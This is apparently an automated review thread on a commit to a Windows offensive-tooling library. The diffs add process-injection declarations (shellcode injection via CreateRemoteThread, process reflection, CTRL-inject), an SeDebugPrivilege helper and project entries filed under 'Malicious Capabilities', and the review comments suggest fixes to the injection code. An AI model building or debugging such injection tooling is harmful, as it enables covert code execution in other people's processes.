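Review bot: In the `E_CTRL_INJECT` case the first `OpenProcess` is not checked before its handle is handed to `VirtualAllocEx`, while the re-open a few lines later is; add `if (hHandle == NULL) break;` directly after it. The literal `8` passed with `&EncodedAddress` to both `WriteProcessMemory` calls equals `sizeof(PVOID)` only on x64, and the solution file in this commit also carries Win32 configurations; on that target `EncodedAddress` is a 4-byte object, so `8` reads past it and overwrites four unrelated bytes in the target — use `sizeof(EncodedAddress)` / `sizeof(Encoded)`, or fence the case with `#ifdef _WIN64`. `hWindow` from `GetConsoleWindow()` is never checked and both `AttachConsole` results are ignored, so `PostMessageA(hWindow, …)` can receive NULL, which posts to the calling thread's own queue rather than to the console window. `VirtualFreeEx(hHandle, BaseAddress, ERROR_SUCCESS, MEM_RELEASE)` only works because `ERROR_SUCCESS` happens to be 0; pass `0` for the size. The `// EXIT ROUTINE` and `//EXIT_ROUTINE_CASE_0:` lines above the function describe nothing that exists and should be removed.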
@ -15,17 +15,17 @@ BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)
|
|||
|
||||
switch (PrivilegeEnum)
|
||||
{
|
||||
case 0:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
|
||||
break;
|
||||
}
|
||||
case 1:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
|
||||
break;
|
||||
}
|
||||
default:
|
||||
case 0:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeDebugPrivilege");
|
||||
break;
|
||||
}
|
||||
case 1:
|
||||
{
|
||||
StringCopyW(PrivilegeString, (PWCHAR)L"SeBackupPrivilege");
|
||||
break;
|
||||
}
|
||||
default:
|
||||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
|
|
|
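Review bot: The switch now rejects unknown values with `default: goto EXIT_ROUTINE;`, but the accepted values remain the bare literals `0` and `1`, and the new caller in ProcessInjectionMain.cpp writes `SetProcessPrivilegeToken(0)`, so a reader has to open this file to learn that `0` means SeDebugPrivilege. An enum used in both places — for instance `E_SEDEBUGPRIVILEGE = 0, E_SEBACKUPPRIVILEGE = 1` (constructed names) — would make the call self-describing and let the compiler catch a wrong argument. What `EXIT_ROUTINE` returns for the rejected case lies outside this hunk; the function's header comment should state it.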
@ -36,4 +36,5 @@ VOID ByteArrayToCharArrayW(_Inout_ PWCHAR Destination, _In_ PBYTE Source, _In_ D
|
|||
INT ShlwapiCharStringToWCharString(_In_ PCHAR InString, _Inout_ PWCHAR OutString, _In_ INT BufferSize);
|
||||
INT ShlwapiWCharStringToCharString(_In_ PWCHAR InString, _Inout_ PCHAR OutString, _In_ INT BufferSize);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllA(_In_ PCHAR InString);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
|
||||
PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength);
|
|
@ -235,6 +235,7 @@
|
|||
<ClCompile Include="IsProcessRunningAsAdmin.cpp" />
|
||||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
|
@ -246,6 +247,8 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
|
||||
<ClCompile Include="ProcessInjectionMain.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
|
|
|
@ -67,6 +67,9 @@
|
|||
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine\Demonstration">
|
||||
<UniqueIdentifier>{5d653d78-df9a-400d-a3bd-3961bf4e09e4}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
|
||||
<UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -537,6 +540,15 @@
|
|||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProcessInjectionMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MemoryFindMemory.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -39,20 +39,25 @@
|
|||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELLCODE VIA CALLBACK ROUTINE INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload is a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes is the length of the payload in bytes
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum SHELLCODE_EXECUTION_METHOD
|
||||
specifies shellcode execution method
|
||||
|
||||
|
||||
example:
|
||||
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = Shellcode;
|
||||
Sei.dwLengthOfPayloadInBytes = 280 //whatever the length is
|
||||
|
||||
MethodEnum flag must be one of the values in the SHELLCODE_EXECUTION_METHOD enum
|
||||
each enum indicates which win32 function to use for shellcode execution
|
||||
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
|
||||
*/
|
||||
|
||||
typedef enum SHELLCODE_EXECUTION_METHOD {
|
||||
|
@ -124,6 +129,52 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
|
|||
inline DESCRIPTOR_ENTRY* Head = NULL;
|
||||
inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;
|
||||
|
||||
/*******************************************
|
||||
PROCESS INJECTION INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum PROCESS_INJECTION_METHOD
|
||||
specifies process injection method
|
||||
DWORD TargetPid
|
||||
specify target process
|
||||
[OPTIONAL] DWORD ThreadId
|
||||
specify target process thread id (depends PROCESS_INJECTION_METHOD)
|
||||
[OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
|
||||
path to DLL to load (depends PROCESS_INJECTION_METHOD)
|
||||
|
||||
|
||||
example:
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
|
||||
Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
|
||||
Pii.ThreadId = 0; //not required for this method
|
||||
Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
|
||||
|
||||
*/
|
||||
|
||||
typedef enum PROCESS_INJECTION_METHOD {
|
||||
E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
|
||||
E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
|
||||
E_CTRL_INJECT //2
|
||||
}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
|
||||
|
||||
typedef struct __PROCESS_INJECTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
DWORD ProcessId;
|
||||
DWORD ThreadId;
|
||||
PWCHAR PathToFile;
|
||||
}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -309,6 +360,9 @@ BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR Extens
|
|||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfProcessInjectionViaCreateRemoteThread(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
|
||||
|
||||
|
||||
|
|
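Review bot: The new PROCESS INJECTION INFORMATION comment block (hunk @ -124) does not match the struct it documents: it lists `DWORD TargetPid` and `[OPTIONAL] TCHAR PathToFile` while the members are `ProcessId` and `PWCHAR PathToFile`, and its example writes `Sei.Payload` and `Pii.Method = E_PROCESSREFLECTION` although the field is `MethodEnum` and the enum value is `E_PROCESS_REFLECTION_EXECUTESHELLCODE`, which the enum itself marks `UNIMPLEMENTED`; the reworked SHELLCODE example above has the same `Sei.Method` versus `MethodEnum` drift. Declaring `MethodEnum` as `PROCESS_INJECTION_METHOD` rather than `DWORD` would let the compiler enforce what the comment tries to say, and the struct tag `__PROCESS_INJECTION_INFORMATION` uses a double-underscore identifier reserved for the implementation. `MpfProcessInjectionViaCreateRemoteThread` gains a prototype in the last hunk but I see no definition among the files this commit adds; if one is still to come, a `// TODO: not yet implemented` on the prototype would say so.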